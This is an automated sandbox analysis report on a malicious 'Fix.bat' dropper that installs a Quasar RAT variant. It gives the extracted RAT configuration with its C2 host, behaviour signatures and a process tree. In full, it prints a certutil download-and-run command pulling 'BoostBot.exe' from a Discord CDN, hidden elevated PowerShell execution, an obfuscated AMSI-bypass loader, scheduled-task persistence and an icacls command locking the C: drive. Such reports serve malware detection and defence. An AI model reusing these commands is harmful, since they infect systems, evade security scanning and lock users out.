Analysis

  • max time kernel
    300s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 19:01

General

  • Target

    Fix.bat

  • Size

    621B

  • MD5

    e235e723f57a72ef725306c3e14d4726

  • SHA1

    9b2153053f8e89c300e32da5df32e9b990594aac

  • SHA256

    aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

  • SHA512

    0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:376
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{89928e06-c68b-4b03-b7b8-a65cb897f2d6}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1504
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:964
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:528
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:928
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1092
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1100
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1116
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1176
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2640
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:srWFFvlZMnYi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$srVRipcHDphiCR,[Parameter(Position=1)][Type]$reRgOiEqIS)$VBaYNgmISIt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'ory'+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+'at'+[Char](101)+''+[Char](84)+''+'y'+'p'+'e'+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+',P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+'d'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+','+'Aut'+[Char](111)+''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$VBaYNgmISIt.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+'m'+'e'+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'lic',[Reflection.CallingConventions]::Standard,$srVRipcHDphiCR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+'d'+'');$VBaYNgmISIt.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+','+'Ne'+[Char](119)+''+[Char](83)+''+'l'+'ot'+','+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+[Char](97)+''+[Char](108)+'',$reRgOiEqIS,$srVRipcHDphiCR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $VBaYNgmISIt.CreateType();}$SaxXSwJVOoAIg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'st'+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType('Mi'+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+'.U'+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+'N'+[Char](97)+''+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$tKFALWbYfLPcri=$SaxXSwJVOoAIg.GetMethod('Get'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HmCAJBYsyKbrhJUBROo=srWFFvlZMnYi @([String])([IntPtr]);$tiDkGecGRdGQJBRXSOssqG=srWFFvlZMnYi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$idSLuwRvsrg=$SaxXSwJVOoAIg.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$oXbFfejgLexLud=$tKFALWbYfLPcri.Invoke($Null,@([Object]$idSLuwRvsrg,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+'r'+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$sAvXBfIttsVKNBimC=$tKFALWbYfLPcri.Invoke($Null,@([Object]$idSLuwRvsrg,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+'a'+''+'l'+''+[Char](80)+'rotec'+[Char](116)+'')));$FxPCros=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oXbFfejgLexLud,$HmCAJBYsyKbrhJUBROo).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+'.d'+'l'+'l');$zKMqImQGarsXkvaMx=$tKFALWbYfLPcri.Invoke($Null,@([Object]$FxPCros,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$CHHqzLtvPT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sAvXBfIttsVKNBimC,$tiDkGecGRdGQJBRXSOssqG).Invoke($zKMqImQGarsXkvaMx,[uint32]8,4,[ref]$CHHqzLtvPT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zKMqImQGarsXkvaMx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sAvXBfIttsVKNBimC,$tiDkGecGRdGQJBRXSOssqG).Invoke($zKMqImQGarsXkvaMx,[uint32]8,0x20,[ref]$CHHqzLtvPT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4208
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1264
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1356
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1404
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1428
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2524
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1540
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1552
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1564
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1712
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1752
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1760
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1860
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1980
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1992
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2040
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1020
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1652
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2140
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2264
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2288
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2536
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                1⤵
                                                                  PID:2668
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2676
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2684
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2856
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2912
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2928
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2936
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2944
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3092
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3268
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3472
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3176
                                                                                    • C:\Windows\system32\certutil.exe
                                                                                      certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                      3⤵
                                                                                        PID:316
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1664
                                                                                        • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:756
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                            5⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:3872
                                                                                          • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3644
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                              6⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:864
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2712
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                            5⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:5108
                                                                                      • C:\Windows\system32\icacls.exe
                                                                                        icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                        3⤵
                                                                                        • Modifies file permissions
                                                                                        PID:4636
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                        3⤵
                                                                                          PID:4704
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                          3⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:4616
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3672
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3856
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of UnmapMainImage
                                                                                          PID:4008
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4172
                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4612
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:2036
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:1468
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:2724
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                      PID:2400
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:1836
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:1300
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:1900
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4608
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3752
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:3236
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                            1⤵
                                                                                                              PID:1412
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:4204
                                                                                                            • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                              C:\Windows\System32\WaaSMedicAgent.exe 3c8f637d6e7c0eec2e1857e0db1da564 oltwVNnOIESZ6ITOnzlYMg.0.1.0.0.0
                                                                                                              1⤵
                                                                                                              • Sets service image path in registry
                                                                                                              PID:4908
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                2⤵
                                                                                                                  PID:2848
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                1⤵
                                                                                                                  PID:3528
                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  PID:1960
                                                                                                                • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                  1⤵
                                                                                                                    PID:2500
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                    1⤵
                                                                                                                      PID:216
                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:4692
                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                      1⤵
                                                                                                                        PID:876
                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                        1⤵
                                                                                                                          PID:2384
                                                                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                          1⤵
                                                                                                                            PID:1460

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                            Filesize

                                                                                                                            338B

                                                                                                                            MD5

                                                                                                                            bd636b3fab24fc3af6ac571dd2ca14a1

                                                                                                                            SHA1

                                                                                                                            3c79726d5eed0891b55229bee3499382a5d6c3ae

                                                                                                                            SHA256

                                                                                                                            c51bae5e8c0479633239f34fde75f171f73f51d5ce480b5ddc11f7dfa169ace9

                                                                                                                            SHA512

                                                                                                                            e3e8f4272b57a5eba491637772d3cf4deca095d568bc9286fd8ed181f474505b7c814ad5ea0bbf3733d185fd7239ee13f8d7ba78958987992208ef6264791964

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E

                                                                                                                            Filesize

                                                                                                                            556B

                                                                                                                            MD5

                                                                                                                            0ffbc964d1e94cef6c6b01f25c226aec

                                                                                                                            SHA1

                                                                                                                            47ac2c1959e2dc306f9acc7fa8dd84c196c45739

                                                                                                                            SHA256

                                                                                                                            6c8a9e34f907ce80067a74ac893e1aab756a2e18e5b16d8eaf7aedb133b15625

                                                                                                                            SHA512

                                                                                                                            43696c06df1461aee46d14a117416b2d692c367f16e5c684f3925e8ffd91819ee98f82cc3f4c78e8509ab740e06850a4486d2d6155704878d2d01e766369a7f9

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                            Filesize

                                                                                                                            408B

                                                                                                                            MD5

                                                                                                                            66b3c93fc4b65c0e069f436bae2ae151

                                                                                                                            SHA1

                                                                                                                            32dfd3223e0319161d48799599e71868ebc3fbb2

                                                                                                                            SHA256

                                                                                                                            c8f3fdeebb1afbef5ee633698e6a3ccdd015b18c36cff8b0b46f2863a3f8f1c6

                                                                                                                            SHA512

                                                                                                                            4047271d08fb1f988818561f5c55b2a15d8235d7fe4e84b25acebfddb10ea4d879e1f1cf2ee3b668d657cb4689766e6dcfac391354f2e585d29c7ea4d6568cc9

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                            Filesize

                                                                                                                            330B

                                                                                                                            MD5

                                                                                                                            74d8c353c5e62fb19c6fe11d4d20318f

                                                                                                                            SHA1

                                                                                                                            ac5b8e590534cf169e8d8786fc0d6bb7a4042ffa

                                                                                                                            SHA256

